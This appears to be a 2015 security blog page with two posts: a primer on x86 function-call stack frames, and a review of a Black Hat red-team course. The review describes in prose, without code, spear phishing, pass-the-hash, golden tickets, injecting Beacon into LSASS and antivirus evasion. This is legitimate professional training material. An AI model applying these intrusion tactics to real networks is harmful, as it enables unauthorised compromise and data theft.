The NSA's Spotting the Adversary with Windows Event Log Monitoring provides an excellent breakdown of key Windows events when creating an initial set of alerts and reports for key windows assets. Part two will break down the second half of the event categories

Monday, September 14, 2015

A Primer on Disassembling Function Calls and Understanding Stack Frames in x86

I've spent the better part of the last three months reviewing a plethora of exploit development tutorials and training material. Exploit development is a relatively specialized skill-set that serves a fairly niche market. The majority of offensive security professionals that I work with or encounter on a day-to-day basis perform Web Application assessments, Vulnerability Scanning, network Penetration Tests, Red-Teaming, Social Engineering and advise on security architecture design and philosophy. Individually, each of these categories require significant technical aptitude and in aggregate they represent a vast body of knowledge that necessitates both a formal education (typically) and several years of experience or self-study to achieve any sort of notable competence or proficiency.

It seems that the generalist will likely go the way of the dinosaur as more specializations  and greater levels of complexity emerge (consequently requiring more ingenuity by a practitioner in any given area). This trend is observable in security firms that now segregate employees in increasing numbers of disparate groups with narrowing focus. Thomas Dixon began writing about this concept back in 1992 and I feel Andrew McAfee and Erik Brynjolfsson have helped to rejuvenate the discussion in recent years. 

So why invest several months studying material in this area? I don't hunt bugs or sell exploit code for a living. Surely, this is an inefficient use of time.

There are a few reasons. Although I do not hunt bugs or write my own exploit code on a daily basis, I am highly dependent on those who do. The Vulnerability Scan that I run uses signatures identified by researchers that relate to specific software flaws. The Exploitation Framework that I employ requires exploit and shell code. Dependency can often feel like subordination. Your success, failure and innovation may be stifled or limited by that which you are dependent on. This is true in many aspects of life, but demonstrably more-so in engineering-centric careers. To achieve true independence, and thus freedom, we have to attack knowledge dependencies. 

The material I am presenting here is nothing revelatory and is likely explained better and more thoroughly somewhere else. Nonetheless, I am documenting it as part of my ongoing learning efforts and hope that it may help clarify the subject for others. This is not a comprehensive introduction to assembly language and assumes some basic knowledge.

Deciphering assembly is tedious at the best of times. The expressions feel archaic and are not designed with legibility in mind. Someone who is new to exploit development and reverse engineering will often feel lost while stepping through a sequence of instructions. Demystifying assembly is largely a matter of interpreting instruction set definitions and recognizing patterns that you can translate to familiar high level language concepts. There are a number of patterns or routines that become apparent the more time you spend in a debugger. Perhaps the most frequent occurrence is the function call. 

A function call is executed when a program wishes to pass execution from the named application entry point (commonly known as main) or another function to a specific sub-routine.  A function may contain parameters and local variables. A number of things must occur for an application to successfully execute a function call and pass execution to the set of instructions contained therein. This set of tasks is referred to as the function prologue. 

The prologue stores values on and prepares the stack so that the function can execute it's instructions. It will also save reference points that give the application the ability to return from the function to the previous location in memory that executed the function call. 


In this image we can see that our application has reached an instruction that will transfer control to some function. This is evident by the existence of the CALL instruction. The CALL itself does two things:
  1. Push the contents of EIP + the byte length of the current command. This is done to preserve the contents of the return address location on the stack.
  2. Execute a JMP to the location of the function we are calling so as to transfer execution flow. 
In the main thread we can see that the CALL instruction is located at memory offset 00401143 and is 5 bytes in length. The value of EIP  + 5 is pushed onto the stack as this is the location of the next instruction in main. EIP is then loaded with the address of our function and a JMP is executed and we step into this function.

Execution flow is transferred to memory offset 00401020 (the prior address that was loaded into EIP which contains the start of the functions prologue). The prologue will almost always execute the following two instructions:
  1. PUSH EBP
  2. MOV EBP, ESP
EBP is the base pointer for the stack. It contains the static relative base location on the stack for our current frame and can be used to reference parameters that were pushed onto the stack or local variables contained within the current frame. ESP is the stack pointer and points to the top of the stack. It allows us to push and pop data off of the stack. EBP is pushed onto the stack to ensure that we have a base value that can be referenced when manipulating variables and values for the instructions contained within our function. The value of ESP is then moved into EBP to ensure that EBP points to the top of the stack.  

A PUSH command can be thought of as two consecutive events:
  1. SUB ESP, 4 - ESP is decremented by 4 bytes (as stack addressing grows downwards) to ensure that it points to a new location at the 'top' of the stack.
  2. MOV [ESP], X - our value is moved into this new location.
A POP instruction will decrement ESP by 4 bytes.

It is also common to encounter a SUB ESP, X instruction in the function prologue. 

Consider the following function call:
void ExampleFunction()
{
     int a, b;
}
In this case our function has two local variables. To create space on the stack we would subtract 8 from ESP to grow our address space downward 8 bytes (enough space to store the memory offset for our two local variables). 

If parameters are passed to the function then they are pushed onto the stack in reverse order prior to the function call itself being executed. This infers that EBP + some offset can be used to reference function parameters and EBP - some offset can reference local values (alternatively one may simply utilize ESP).

The function epilogue is simply the inverse of the prologue:
  1. MOV ESP, EBP - Revert ESP to its prior value to free space on the stack.
  2. POP EBP - Restore EBP to its prior value.
  3. RET X - Execute a RET command to return to the prior calling function or main thread
RET can simply be thought of as a JMP to the value of EIP + calling function byte length that was pushed onto the stack prior to jumping to our function. After our function prologue is unwound we refer to this value to hop back to the next instruction address from our calling thread.  

Although there are compiler specific calling conventions that may introduce additional instructions, this summary should provide you with the information to recognize and interpret function calls in assembly. 

I may do a series that focuses on identifying and interpreting common high-level language expressions in assembly as I continue to dive into this material. Let me know if you have comments or feedback.

Related Links:
http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-manual-325462.pdf

Sunday, September 13, 2015

Black Hat USA 2015 Course Review - Adaptive Red Team Tactics from Veris Group

My employer was gracious enough to send me to Black Hat USA this year. I've known for a long time that Black Hat is the premiere conference in our industry and they most certainly have the broadest and best compendium of training on tap. Naturally I jumped at this opportunity and began considering which course to sign up for. 

There were a number of options that were extremely enticing (Dark Side Ops from Silent Break Security, Special Topics in Malware Analysis from Mandiant, Shellcode Lab, and of course the regular offerings from Saumil Shah, Dave Kennedy and many others). Ultimately I elected to take a course that would benefit me both personally and professionally in the near term.  I wanted to study something that would be challenging and interesting but that would immediately benefit me at my current job (and possibly help us to expand our business). 

Black Hat has something for everyone (across the defensive and offensive spectrum) and after considerable delibaration I decided to register for Adaptive Red Team Tactics from Veris Group. This is an interesting team in that a lot of the core members burst onto the scene a few years ago with very high skill sets and seemingly no prior social media presence or history. It's no coincidence that many of them have military backgrounds and it's easy to see that that these defence and intelligence agencies are investing in and producing extremely capable information security professionals. 

One of the issues with BlackHat is that there are very few course reviews available online. You may find the occasional critique on 'Ethical Hacker' or an independent blog such as this one but outside of that you are selecting a class somewhat blindly. This is in part my motivation for writing this post. I encourage other attendees to do the same. Ideally I would like to see BlackHat incorporate a formal community review and rating system to courses that are offered year after year (or at least instructor reviews).

The class was mainly taught by Will Schroeder and Justin Warner (with help from David McGuire and Jared Atkinson) over 2 days. Will and Justin are fairly well known on the conference circuit as they have made a lot of noise in the last couple of years due to development of their offensive oriented toolkits Veil and PowerView. I'm a big fan of both of these projects, and based on the military background I knew that these would be the ideal people to learn Red-Teaming from. Notably, Raphael Mudge (the creator of Cobalt Strike/Armitage) was also in attendance which was a huge bonus. If they continue to use this tool as the primary post-exploitation framework then I'd like to see him continue to attend as his presence and contributions felt very natural. However, Will and Justin recently debuted Empire, a PowerShell based post-exploitation tool that I feel will play a more prominent role should they continue to offer this training.

Red Teams in IT Security are somewhat of a new concept to non-governmental non-defence related organizations. The idea is that we have to go beyond Web Application Assessments, Penetration Testing, and Vulnerability Scanning in order to secure information assets and operational security. Red Teams will model advanced threat actor behaviour and embed themselves in an organization for an extended period of time. Similar to a Social Engineering project, Blue Teams (or defenders) should not be aware of the presence of a Red Team. Penetration Testing will often reveal holes in the organization, poor practices, exploitable vulnerabilities, and other valuable information. But what value does this really provide defenders? Maybe now they have a few vulnerabilities they can go and patch, a user to reprimand, and a network to segment but that hardly benefits the ongoing day-to-day defensive operations of the company. What did the individuals watching the SIEM and IPS/IDS get out of this engagement? Do they better understand offensive threat actor behaviour? Was there any qualitative or quantitative follow-up with the defenders to see if they caught anything? Were forensic artifacts provided by the penetration tester to help defenders improve? In traditional penetration testing, the answer is often simply no. There is still value in running a project like this, particularly for immature organizations who find a lot of these concepts to still be extremely foreign. But for companies that have invested heavily in security products, people, and processes, this information does not drive their security program toward maturity and evolution.

Red Teams are all about advanced threat modelling. A penetration tester will typically look for vulnerabilities, exploit a system, elevate privileges, steal credentials and take over a domain controller. This is usually the extent of the project. Oftentimes Social Engineering is deemed out of scope, an internal foothold is provided to the penetration tester, and staff are informed of the event or worse, the activity is whitelisted. A Red Team will look to model an advanced threat actor by establishing stealthy persistent backdoors, beacon out to a command and control server, spread laterally in an environment to take over as many systems and user accounts as possible, install key-loggers, peruse sensitive file shares, identify critical databases, exfiltrate data, and abuse domain trusts. This can be done using a black-box approach in which the Red Team must break past perimeters using social engineering or by exploiting external-facing systems. Other companies may elect to plant someone on the inside and provide access to assume a footprint on the internal network has already been established.

This sequence of activities closely resembles the pattern of attack employed by hackers in massive breaches seen at Anthem, OPM, Target, and Sony. If you are worried about whether your network and employees are resilient to these types of breaches, you should be validating the effectiveness of your Blue Team by throwing a Red Team at them. 

The training environment focused on separating the class into different Red Teams each tasked with attacking a network. We worked in teams of four and spent most of our time in Kali, Cobalt Strike, PowerView (a PowerShell post-exploitation information gathering tool). Metasploit is great, Meterpreter is great, and those projects have a very valid purpose but they are not effective at emulating modern adversarial TTPs.

Day 1 - After some brief introductions and biographies we looked at defining and differentiating Red Teams from standard offensive security service offerings. We talked methodology, use cases, and general business oriented knowledge. The rest of the day centred on installing Cobalt Strike, standing up a team server, stealthily profiling a target company and launching a spear phishing attack to establish a foothold.  The lab network was very well set up and reliable. Each team had their own set of systems to attack. The class was given an introduction to Cobalt Strike so that we can understand the differences between Beacon and Meterpreter, setup listeners, launch spear phishing attacks and perform other functions without constantly having to reference the Cobalt Strike manual. Raphael obviously gave great insight about how to best use his product and the Veris Group team focused a lot on emphasizing how to be stealthy and use the product to avoid touching disk and triggering alarms. 

Many students immediately resorted to well trodden offensive security methodology by running vulnerability scans and attempting to exploit the perimeter of the target environment. Veris Group had an active defender monitoring for noisy and obvious actions and took steps to IP ban or process kill teams that failed to employ stealthy tactics emphasized in the class material. Jared Atkinson (threat hunt lead for Veris Group) took the time to explain some of his defensive strategies and was primarily using tools he has helped to build (namely Invoke-IR and Uproot-IDS). This was a phenomenal aspect of the course as we were essentially forced to adopt the lecture material that had been covered in order to be successful. Moreover the theory did not feel specifically crafted for this course or environment and consequently the attack tactics felt natural and applicable to real world scenarios. 

We also looked at how to profile a company, crawl public resources for information, give context to Phishing attacks by researching social networks and company issued press releases. Emphasis was also given toward attacking weaker subsidiary organizations connected to the primary target. The instructors revealed the best ways to get a foothold on the target network (there were multiple avenues of attack as in the real world) and ensured that all teams were caught up after giving ample time for each group to launch their attacks independently.

Day 2 - Our time was primarily spent abusing native Operating System services and trusts to elevate privilege, move laterally, map domain trusts, identify sensitive users and files, exfiltrate data and establish persistence. Naturally we used Veil and PowerView to abuse service and executable permissions, scan the network for user accounts, local administrators, and interesting file shares. The instructors covered how this is nicely integrated with Cobalt Strike and introduced SMB Beacon which is an exceptional way of pivoting stealthily in an environment to compromise additional hosts. 

A lot of focus was given to explain user privileges in modern windows environments (TGT Hashes, Golden Tickets, Silver Tickets, high-integrity user context) and how that maps back to various Windows infrastructure (Kerberos, Active Directory). They also spent some time talking about Active Directory and demonstrating how their tools can be used to identify users and groups in a domain that have transitive, bi-directional or one way trusts to other domains. 

We also covered the trade-offs between PSEXEC, WINRM, and WMI when employing 'Pass-the-Hash' based attacks and talked about the importance of leaving as few forensic artifacts as possible while never touching disk. Cobalt Strike's Beacon uses reflective PE/DLL injection wherever possible and this is very impressive. There are even techniques we learned that enable us to inject an encoded post exploitation agent (Beacon) using a trusted Windows service (PowerShell) into a trusted process (LSASS). Combining this strategy while pivoting over named SMB pipes is incredibly stealthy. Anti-Virus who?

Overall I was extremely satisfied with this course. I would definitely recommend it to anyone who is looking to learn about Red Teams, threat actor methodology, or simply wants to add to their skill set. It was well presented and challenging material. The lab work was not linear or direct. It allowed for creative thinking and encouraged students to solve problems in many ways. I was exposed to new tools and feel confident using them in my job. If you work in offensive security and you aren't looking at Cobalt Strike, Beacon, PowerView, and Veil then you are missing out on a world of opportunities. The course never lost site of its goals which is to have you apply these tools and knowledge in a way that emphasizes Red Teaming over Penetration Testing. The fundamental difference is that a Red Team wants data and information while a Penetration Tester just wants privileged access.

Related Links:
https://www.veil-framework.com/
http://www.advancedpentest.com/
http://www.invoke-ir.com/
https://github.com/PowerShellEmpire/